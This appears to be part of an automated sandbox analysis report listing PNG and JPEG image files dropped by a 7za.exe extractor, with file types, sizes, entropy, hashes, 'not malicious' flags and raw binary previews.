      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 12 x 19, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):229
      Entropy (8bit):6.512721459216229
      Encrypted:false
      SSDEEP:
      MD5:CBC90D77E03F1FCAE22D23A67C478CA5
      SHA1:8EA1CB3E839D15D076AB80929FB08741AD5D9104
      SHA-256:47376DEFF27CBE99E7B3B86A7A5513F6F1B8E86CEAF023263CD2B566F847AFF2
      SHA-512:1A3CC0ECD45B1D1E723132505390055C6BAED426FAC0C4FD963712C538D4820F22D7DA779DA967383CFFF9602F09FCE47A894A1857588CEDB43E995C3F5BA1AF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR....................pHYs...%...%.IR$.....IDAT(.....0../D..)]f...R#d..)3.Gp...44@.&%....;..$....Bg]..xz......T...d..K..!...+...d..R...O..xT..J..j.......+..P.G..Ga..ax..^]..IH.$.....P.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 264 x 263, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3747
      Entropy (8bit):7.772824282184286
      Encrypted:false
      SSDEEP:
      MD5:892AA4A165B5EA693E355ADB8DC3C49A
      SHA1:BBFD0CBAECACEEE995AACB1E6DAC2A34056B3EA2
      SHA-256:821419585543599E87261C4B3FEC2317B59FC46E62399E7DB5B6A3159EC14F79
      SHA-512:03261E210593E6350480C1561850A9CA9E862E3E76917ED4DC2459BB03290B8D663B8CE1DE1CD3E16FA09A2E40E1C1BF6CACA0DA92D6F0EEBC8FDCAF7F0F5F95
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............R..*....pHYs...%...%.IR$....UIDATx...q.Y.._S._d 6.......l......2.,..(.A.,.......FD...... ......SE.6.[..~..so.....&..,.F......:.yU._..%..Q...."X../...?...:...^%m..Z..9..!.h.......(.&......A@.d0..C...(....s..A..R.K........(... R...d0......0V&... b..D..P.....Y .....AD'.~N...H+l%-M..,...b.I.......x4Q.........oK....AtUF.L.......X...A4-...9eD....Q .......g...@.........@.....A..af/z.i.b...8'.....J..^...9C. ....b.....i...d.a..\.o\...OVv..D:r..x.>..-;.....[..+'....li"..G{..a...f.... .[.es.D<b.[9....41..7.u..^..9@Cibc......b......Dt.....5"Wb.7h..I....Q..VRl..t.....J.h.a..?....Y.-)1......#[I....A'...b...C..vv."...@..|.N.:.D.....&....$.fY6C...a&.+.....Bl^....f.8..G.\0%G0.@....:,..~.#.A ... .A....qX....I .3rX.iL@....,.r....V.. ..@..$......I@...9..$..v..F....r.....K/.a.V.=...."It>.i.@..9.....s...N...e..2........ .[.C....a!U'..v. 9.\.N....N.a]Z.B..c......f,...(......j....8.....sn.. ..........^.....Yb,......GJ+."..h.gW....~D.%.......ET
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 264 x 263, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3687
      Entropy (8bit):7.752482478440734
      Encrypted:false
      SSDEEP:
      MD5:F8A8089C7D3C18872DE3060A53CB471F
      SHA1:3536BA6908B5209EB952C65A8AA943E0F2C82645
      SHA-256:50162BA4FA5587AF84AB033D4266EE30EB6C7525EBB6516D6C322BE1F9585D50
      SHA-512:11A7BFC9967F97185A5775D2DD5D90E27AA3D60374ED918E106F95EF26894006B3425311B77A194B7FCFEDAB14F55E06AE1794D7DFB1C491899E49CEED9A528D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............R..*....pHYs...%...%.IR$.....IDATx..Mv.I.F?s<.;.z..W..h\..0.h\........Th.........X.{...B$.I....p,.TXD&..E......wAX.>.%..@R......>.....$m.|.Y..o..p.. ....=.B.q..{6q.S.A.....A.>...s ....5Y.S.x.(#.(......ePF...c5.o8......DH$.%]D>$..A..$.M...I^M...h.d8.D.R.ZB %TK..0..D..'..RhT.$.........Hk.XHZ0g. \.!.~a4:.Y...A. ......wS.^...E.1.....G...@.M.!..@..'O&.&5.D.b....P.WI..h.`(..b.S...(.DY1....G...S.(.D.....c.... .._....G..Z...."zAX..L.1.?.$f.".rb.<...leG.-.Q....nJ9.....P..K.\........A.......... 5.i..z..a.........,.. <.C.R......m..N.VR,E_....$....J.+)......$..Z..D...b&.P.;%.0.U...a..K1..n.j.........6....R.... ...0.n..vip.....A.+...o......}.[...{7.a..d$..v...f...A.R...,).E.^.......$Z..9....r...G.A ..o%. ..D"..5.!.....KIKW..s.@.@.. .....p-A,.. .w$. .C.+@....NF.)9.!...W.nt........?....:m..}.K$.......h.Y..L.v......@.....T....L.Rl%]u....9..r.(.}..N....3..q...F.%.]..O.5..:i. l..FLJ.Ta...fZ..l..X ...\HZ... l..c.P...].....f(......7
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 386 x 111, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):6507
      Entropy (8bit):7.901700394057512
      Encrypted:false
      SSDEEP:
      MD5:29200DC1FCBB3BBB921A294A99904740
      SHA1:053377AEE27A58D5FD387ACFDD9885D05BDBE4FB
      SHA-256:3C35E6BF6F55A5F14301B6EE09FDE08022F0564977B3AE5C22A66373B78F9059
      SHA-512:3D1343269D83C7973E86ACDE77F658ED0A5FC21BB13E1822669B6A3E7DF6B1FBDBD4500959DEA4DD0C2CE1C1574EC251291B2739F528201AF6EBC5052CE73DD9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......o......W.a....pHYs...%...%.IR$.....IDATx..{lT.......[.m.R.!T.bUJ..j.7Xi1Q.E.qI.=.`.(I....m.;........m0......@...iT.....X8DPh.....s..#.......x....zog..y.w.w.hB..B.._...K5 ...$..: ....B@.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!...@...0..._>...!.B..1......U..4...S..!........6......F......*.w!.4.[5...:4M3E@.G.!...!.a.hnn.........0|....B!..........*TVV....n...cB...?!-{......jmmEnn....`.....u..........B..S....6..w..9./..<x.........0`...).m.!!!.qqq.4.k.I...!...D..nJi......CCC.....i..v..YM.......tvvzy..s.......3.u.....r..V.\..0|........@qq1Z[[.3 .P...W SD.o.nN....n...2..c.EQQ.*++.v.Mo..B(.}...ue........x.WLqP..*..w...QTT.....)....!..>.....fZ.....EEE.......y.ra.1cPXX....x<.3. ....CO...`g=.5....{..@KK.*++....1c...SBR.....\.x....HOO.O~..."B.!..f.Y..^.w.m(,,DLL.9.....Y.t5.0n.8...b............X.r9...!77...,..R...........A^~G..... ??.+f...!.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 38 x 38, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):955
      Entropy (8bit):7.706307990756938
      Encrypted:false
      SSDEEP:
      MD5:C889633992A7E2A48830E83413A80172
      SHA1:B175837704A25B5B421416EBDD1EE58CE00936FA
      SHA-256:6172C190C48714F2822BA7F973899EF105C3DB782AF0876FCE4F2E1C39FE3B8A
      SHA-512:2947748C42DB7CAD40A3DDB63AB59D0A90B7E6EF52899F7C6BFCD8A4EF6099E69D4973D8E8C335EB30F5D1ED442449D5949FDE036C09DE4BDE7FB77150D11FB7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...&...&......=.....pHYs...%...%.IR$....mIDATX...q.@.E..{..8....f.0..E..#...q....Ek..m."...@..........*.*}Z....v..+.8Oz@...7...Z_...P......X.'....W..%......6.......X...j.<.....P.i].j..<.&..0v........<..L..F........&..R..a.H.....H..l...w/....Y..S......LI.&/..y.I......I.<8v.zI.^)....>.........;....P..Z.VMC....m....g)....:.....B..@...}.V..D....}...y.).]+......^.....Ob.2..B.....2o-k....LA9....NalO..;O.(m.._.....F..,..s.$^{v.W.;*..T".Q..2.B.z.U...lQi.k.h..I.EE..^E;Xxw....K.P&.(....f...4o.F.rs.k.s.#.:"o[6..w.3P...e.2.B.v..0...s.c+.#s...-..[hrh...jP..V.`=...cW...B/.OMU.^.c.U6T.W....Da]...7F/.F.j.t....O.........8O.8O.2.!.8P@7.V$..JA..sT...`2?=.$.z..]M..$.*....^./..5)....;NV.......Eu.......U....JE.%='...r..K...W..l...w$.u....X.5c.Mv.Tv.Q.P....'..i....XT.5...@W.....?.N.r`c...l!%.....K.=......F-.kY.j..K=....ge.....}...........9.t.'@..u.(]..n...x.@......X.'..P.9..=...W.r...1.c.:.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 38 x 38, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):714
      Entropy (8bit):7.619826962199956
      Encrypted:false
      SSDEEP:
      MD5:CC2B43617A195062B9AD2C00503679CE
      SHA1:65AC2D284FCB056FD0190BD121327BF85F7F5726
      SHA-256:C9A959EA76BF7F44594429E248371295CF4BF9FEE951C9165AA007BF981408CC
      SHA-512:5F2BF991D1EC385E42D09C667339150BA14D80FF44870F339BBF7A820FDBF030CA014B1A84B3D301BBEF8DA350CA9AD3D6ACA4B9EDDE5BCAB8FCD9DCAC7E57A9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...&...&......=.....pHYs...%...%.IR$....|IDATX...q.0.E.[..20!..!..*.B .2X9.6.....@......i...<...<.$tt..<...h4|..?..#............w.....x"..2.x'.Y.[..#..@..X.x...8q..7P.`S@.@k..b........&.f.?...Wf[......=.F.A.0..]....%TP...A(..t..M.k...ddsA....#f....s.;;D.=.X....C\..Rk.{.B.8.!.7..N....j.4..`b..2P:...........j.(.IE.b(....#....0.$M.jm<w.A...Z{F.Q..LU.z..LC.H\N..i.dE8.}I..L.Y.u.....\..@....=3.7d..ju.E:.......p.oV.S..5..n....Wc~..\.ID[.n..V....d.4N...zx..mn....z....dZ..U_U....g..S..S`.Jf.)a.H1V.S..~.w.D.?..qT.LD...o...x7......v|..9.d....&.em2o.`.l3P..i..J..5.K.O.^.G6=........]B)..d..9i2..Z.\.(..5.WCY`g..P.....P..,..>n.e)6fz0.....=.....?p.x....J...s......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 1889 x 993, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):69928
      Entropy (8bit):7.7602834187039305
      Encrypted:false
      SSDEEP:
      MD5:5C8090EEF82B4EA561EC725D4D8942F7
      SHA1:2B8A66B03AF90231B7574D1E0892D90DD8FBC495
      SHA-256:436B31E9142FA1D31CAE099F31341864EDB522A35EC9DE15043707C9A98F5CBF
      SHA-512:02196051315E9F577D8D9214F0A45B9743EC924613827F533923C2086C0F51BBF03C0F248C03C2084532021D7158FC4805F6BFB9B2574120E74DED6BC1CD2814
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...a..........e.e....pHYs...%...%.IR$... .IDATx..._l.w....dg...}..H..}.rG.?$kRN...u.x..,....A|3(...\.#.+...G.(.(s.$.....q.I...q .,.......G.}n.9).h5.E.......n...K.B..t...]U..}.?.._.*T?..$5Q..q+.Ld).........@.....:....4$._.~*R.>.4.J&.).........@i..V!.G$.J.Q..J.J%...............a..i..NS.<............P\/P..A......=D..............U..~I...paSR{*..O)...........H..1F..RH.8e.........(.B.*.o/.H%..~..).........@..a.C?%..C.......... x?..U....}............Vn.R..&*....K..4.J&..[.'..._)W...l."F....(V.X{../>..f..T2..b.......*Y>|.........P.h*.....d$l.hyi.b.]....b.............h.e.+7*...J.~..R......9a........@.1-{H.M....9!I....}.!,.........(...cT.@..`Zv...A..........*......>..sTK"...........$....J.(3!I#[.C..........*..%.P.O?...............$..`..P.....j..~.3../.).>2...8.v..L..I%.............R.o.@4...A.F......y.+.S..|w.E{$...........T.mC.....`...0.t.....a........@.h....."...Y.G"............@............@..a..........T....+....,...S^.........PK...ts.6..P..,E..^..;3
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 1227 x 813, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):41208
      Entropy (8bit):7.701735991466628
      Encrypted:false
      SSDEEP:
      MD5:05C5C4F3473372B9E334996096A50898
      SHA1:50255FDAA3DCB7506A8D7A9530D55A0BE717C770
      SHA-256:C1C2D04C42B493C9C73380D89DBB115809CF1E283FB1749CEFA8B4287A68E494
      SHA-512:654718E65E87794F47C54EBA1D1C2FA370768A64CFA6A0EECAD4A7FAE82E02FCEF7ED37DD465A974B8B40D42FEF026B92AB79458D3DF1B3AD2234DE4B0608CF7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......-.............pHYs...%...%.IR$... .IDATx..._l.w....d.9Zu..G..im./.l$..d...|.......o:a....D.G.h.b.......*.(....g.}.......1d..!..K...n.....=r[....f...rB....]....Pf..2...........o.Q..V4(iH....JoE...D<.B9.....@=.Q..2..J. )..Q1.4.............e....t..."=..O`........K.......AY%.4C......@=)KXfZ.~I.P....L...........Y6B...J.......EYz..V4-..W..H.c3.....@...[%.R..?\.{.r.~n.......)..5-->........@..VtD..-.T....!i\.(....r.....8.Rb..c..,H.......">.\.J5...(.?~..C.4..%J.....(.'(..A.P*.I.p._..........4*.]..0.....2....@Y8....@Y.$.Q............%..j....eJ.....(.=..8~.v6Q!.o$..]._..uG...V..L+.O...#,...........s....R..GW.LP..........(......y ,........L........ ...W....$E.Z(H.........FryU...1.......8r0../]Q2...k..4....E.....|....z.z......i.7.g_.z.u.0.RYl.e......%.Noh.......n.4....oj....}.2_.%4+".2..........{.....m;....3M....f...O.....F1.........D>.dJ.]..wP..tzC./].4*..#,......(.O?..-..g...)%.W)..jj..m..l............#........@..q.fQF.].2.....B..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=165, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=293], baseline, precision 8, 293x165, components 3
      Category:dropped
      Size (bytes):43237
      Entropy (8bit):7.6948059654526135
      Encrypted:false
      SSDEEP:
      MD5:8793D2E680B3D19E204993E244B5EE69
      SHA1:0F6644C24713CDB4DF2AB4ED5771D32B2511A942
      SHA-256:D10292BF264E89B328539BF7AE60D514C432AEA361C55931DAF77C4BF94E1590
      SHA-512:1BD66507BA172CB33CDA0F8BF695444B9D4162A00D8AB69186B99CD10F26E19E7668C53EC16A1B045CABDC9A2FACA122575772CBBF5CC84837E5AFE6EF542C5D
      Malicious:false
      Reputation:low
      Preview:.....0Exif..MM.*...............%.......................................................................................(...........1.....$.....2..........i.............$............'.......'.Adobe Photoshop CC 2017 (Macintosh).2017:05:12 15:52:55...........0221.......................%...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..3..V.9c........{".0S...#F...K.".z.."L.+.-...W.C..{]....O.5.[.H.H...E.sA
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 601x339, components 3
      Category:dropped
      Size (bytes):275439
      Entropy (8bit):7.9224482817679815
      Encrypted:false
      SSDEEP:
      MD5:E454465CBFF1C0033182E5BE3EA027BB
      SHA1:2DA2AFD0181E8A1BF4EFED76DA390E6B267A5DC9
      SHA-256:EC343EC77B5BFC6C96D5B51D9DFA89E67A752C46AF953C5A7E489BFBD1BBDA28
      SHA-512:5F4BDF8FCB8C8857D635918E384ADA0D6A2DBADF2B8C4E306A7FE4396290D772551EAD96AECA8216305EE7206D9F2729A4A0959F3AAE4B95198EDB80E5169FA0
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...........................Y...........S.......8Photoshop 3.0.8BIM........8BIM.%..................B~......S.Y...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................L............?..P.R#.?8.....A.dg...v......\..%.R.l.y].......kr..m....y=..o~.s..=.RA$.X..z...'on23..=[..9.5#..R.Z_m-wf...K#.....s.....G..m.M....r.7....m..}1........+.Tyu\.iJ..t...g\cK...U....m.e~..\.i....6H.`.A..O.:.;W....Q.'g....?..;..|.z..~....ZJ.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=165, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=293], baseline, precision 8, 293x165, components 3
      Category:dropped
      Size (bytes):52749
      Entropy (8bit):7.759102574833971
      Encrypted:false
      SSDEEP:
      MD5:490D8F83884BE9FB550DB7F18A6D8906
      SHA1:84CAF5643DFFD6BAB005AFC9D7D98241AAAE396F
      SHA-256:FD1F6E639BC5D8799A88EE661AA9BB84E89548A9247C30A22D76A866C215CC2B
      SHA-512:6BBBF2C15447653061CA487FB9088F10BECDCCBC9557951CBA64438C9520EB1134868F2A40363BD0F1F2CFD61B6C842387EF4B72AED07769F3FC2B873304A7CE
      Malicious:false
      Reputation:low
      Preview:......Exif..MM.*...............%.......................................................................................(...........1.....$.....2..........i.............$............'.......'.Adobe Photoshop CC 2017 (Macintosh).2017:05:12 15:50:50...........0221.......................%...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..j.{G.....##X.V.5......^....<.aO.".0....".!....U[..G.F.h.\#E..D.....fs....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=165, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=293], baseline, precision 8, 293x165, components 3
      Category:dropped
      Size (bytes):68270
      Entropy (8bit):7.806351473251056
      Encrypted:false
      SSDEEP:
      MD5:85791B30FD7B119ED2CCAB11BD373FCC
      SHA1:45CB81A4D15AEFF410C02190B1A54281EB1BFDAC
      SHA-256:F9FCC8C84C6A7FDC9F9091B5207E91F9CC81C3BBB7B66C9CAFD2891EB74A4D22
      SHA-512:2C07D4FC6336C4AD921C3D8A27F5ED2A5487C635738077557ED542B761AEDE5FFC24842FB66F39B51D588EE3A75FD79B9EE616BA0D8314ED84D434A19ABD0AEF
      Malicious:false
      Reputation:low
      Preview:....!yExif..MM.*...............%.......................................................................................(...........1.....$.....2..........i.............$............'.......'.Adobe Photoshop CC 2017 (Macintosh).2017:05:12 15:54:25...........0221.......................%...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...#.uB"y.|T...S.....).`.@..`.S.]$.!...B7.g.VPhuA.m......P;..S..g..\.v.J..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 293x165, components 3
      Category:dropped
      Size (bytes):32526
      Entropy (8bit):7.933812755854494
      Encrypted:false
      SSDEEP:
      MD5:1618AF6F4A01AB691A3F057641E9FBAE
      SHA1:CF836A640624A1075B9125B3BE225EB5D689F7B0
      SHA-256:979409736CF0564AFCB65033E963363FFE70EC2A636EF9CC295E54139E27B628
      SHA-512:76BC8CFBB92CBEECED9ED3A5E9C01E3B44FDE4F5EECB06B841C98F3D6AE656F86A9E601D531B1D1ABD14DA9B0B11FD350D65AF15F3885355A44D58A33C1D8010
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...........................%...................8Photoshop 3.0.8BIM........8BIM.%..................B~........%...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................%............?....M...O...Y$..YYr.......@N.../..=..A....t`.....r....;..............._|...<....Oo.\........<R.}_....o..#......NT....#.?.h...~|F.e6.....`.}....8 ?.{......./.D|m.hQ....f.;Y....>.up..lR.2-.q2.s$.b8.cl.G...O.fPR........`.K.v......U.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 293x165, components 3
      Category:dropped
      Size (bytes):66607
      Entropy (8bit):7.925137479717183
      Encrypted:false
      SSDEEP:
      MD5:AD1251A5C6FAFBF2BED143A58658C7D7
      SHA1:D1B6801940E87C22073EDEA7975CAD7EDA59D035
      SHA-256:598B79C9D60975CF76BBEA88C6792A9C679C52BF074FDCFCC5009F3E66179A1D
      SHA-512:7DC41432858E22F4DF6DF23E38D4B12BF92E685C247FE8B664991B50150D9ACB2EADE268373885E41621416F3B1A3EDDF87F0C048233EAB8F06E68D5FD4FC0EB
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...........................%...................8Photoshop 3.0.8BIM........8BIM.%..................B~........%...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................%............?...Xa.....e..b..Ps.'.c?/..]..z.......w.&V4.......d.o.g..r.1m.....w.g...9o.......)II....v.....S...k....=*......o}/.o...u.tSw.>c.q..#?.g.G' .w.z)F.~.o...........'}/....~......s.c.F.{...s].......<.F...i1.C.`@#(@8.8!.<.3.........^...[.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=165, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=293], baseline, precision 8, 293x165, components 3
      Category:dropped
      Size (bytes):57206
      Entropy (8bit):7.784593575202145
      Encrypted:false
      SSDEEP:
      MD5:ED31ADAF10764C4DF9B6B7A1D8ABB6A8
      SHA1:B8D32E47B145BC20B9B502DF1626B2B3DC18BF94
      SHA-256:54FBECCAEF8CC4400D488857049D87FD865FAF0868ED3F2B374FFEA973CBE4FC
      SHA-512:BFFAB6C8F0ADC2900B6E35DA61DF54A40ED36A7700DFB6C2951E906FC8730A43E3958EA644F5726349269184111F35FF31AFB4ED211B2872D02BE1537DD3C9D6
      Malicious:false
      Reputation:low
      Preview:.....IExif..MM.*...............%.......................................................................................(...........1.....$.....2..........i.............$............'.......'.Adobe Photoshop CC 2017 (Macintosh).2017:05:12 15:54:59...........0221.......................%...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..mM....}.#F..h....?.k.+..]/.V.........5.}.6S..M>.z..N....K.....L..k.....a;}
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=165, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=293], baseline, precision 8, 293x165, components 3
      Category:dropped
      Size (bytes):45032
      Entropy (8bit):7.710501277125752
      Encrypted:false
      SSDEEP:
      MD5:AA7829885708F56BD464121E9FD49884
      SHA1:E8B00F02F0C58D55A8C4D65AC374620207C5A3B6
      SHA-256:2C8EE1AD90FBF5CBCC01C6D45574F2A93B35E7EC278A8FF60337BC46AC3CCC4A
      SHA-512:1BE01F259E22653BC9780E896B7E6F1C511C5FEA9689D6A1B02D980D091D3EC443717E68E32B877AE81C6B0B60627AC81004B147B03A11A420C463BCFDF0A5C6
      Malicious:false
      Reputation:low
      Preview:......Exif..MM.*...............%.......................................................................................(...........1.....$.....2..........i.............$............'.......'.Adobe Photoshop CC 2017 (Macintosh).2017:05:12 15:53:51...........0221.......................%...........................................r...........z.(.................................q.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...\...N....uos.k......:....jd..61.p.<Alhc.. R.u.Tl.G..=..G...b...hk...S
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 601x339, components 3
      Category:dropped
      Size (bytes):177822
      Entropy (8bit):7.916288828429167
      Encrypted:false
      SSDEEP:
      MD5:C706E96603DF14083226635640F18C63
      SHA1:BA6F0008D8DBBE33B87C7CC769E5C67CFE6F819C
      SHA-256:20EC63BDE56B83B5B9D67FF32227F3FB3CB36D11319E94C2A413CFC920036853
      SHA-512:AA89DED5D3E417E4AB038B4DE377D0DADF74C0CA9C1DFB770E9276EC47E5175F03477E13987B05BCDD7313B052463F079062C8B2862E6699B05A4177D4B43BF4
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...........................Y...........S.......8Photoshop 3.0.8BIM........8BIM.%..................B~......S.Y...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................L............?...(......(......(......(......(......(......(......(......(......(....3.'.......w./.x....Z......[Qql.a*4..HK...r...9...9.'......^t.V.H.Qo.....zn...~..P.e....J5ja..O.5z.m~n[?u;.k.....E.......`..._...q.nMi.%\.z}..x........<n-9~.......l..J..=
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=165, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=293], baseline, precision 8, 293x165, components 3
      Category:dropped
      Size (bytes):44472
      Entropy (8bit):7.6900638358457085
      Encrypted:false
      SSDEEP:
      MD5:78DC8C6DBF390D8C85F3AE64C4EA7125
      SHA1:61DB6A5571C9269B5EAE5BF33DF293B804919998
      SHA-256:2D8BD276EF73D45D0E6A20ED6631EE130ACB3DF4088C0BE5B4E400EC04BBDE3C
      SHA-512:A12BAC53A3716A087D90B992D52348D00E17F169A0C2E4A8E0F61738FE7F37213D46AF56C7151EE1A094D5F67D33DFDEB3D9BE7DA11EAD92292BD3C4CF62D76B
      Malicious:false
      Reputation:low
      Preview:......Exif..MM.*...............%.......................................................................................(...........1.....$.....2..........i.............$............'.......'.Adobe Photoshop CC 2017 (Macintosh).2017:05:12 15:52:09...........0221.......................%...........................................r...........z.(................................. .......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.N..0.et.a...3....M...3.mv.....FFv/.M.2......=......c..%7.Yc.7F'..s.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 23, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):495
      Entropy (8bit):7.239917665656031
      Encrypted:false
      SSDEEP:
      MD5:9528E73430A6B902EA9BF2A7141851EF
      SHA1:08195E3C36A72F566858E45887A68624F5150C30
      SHA-256:DE7BC7CEB22EA3F89CD18801A38614FCCF9C89F3CB059ADEBEF07011E2CAA650
      SHA-512:D677B740B68EB5F1D15310043DBDA121C6E477EAE92E9BC3CD21A6B3602C474E20EAAA916694461A3FF9B2C3BDF314762CC9DC2E4A0738F3D6028AC8D996BEC3
      Malicious:false
      Reputation:low
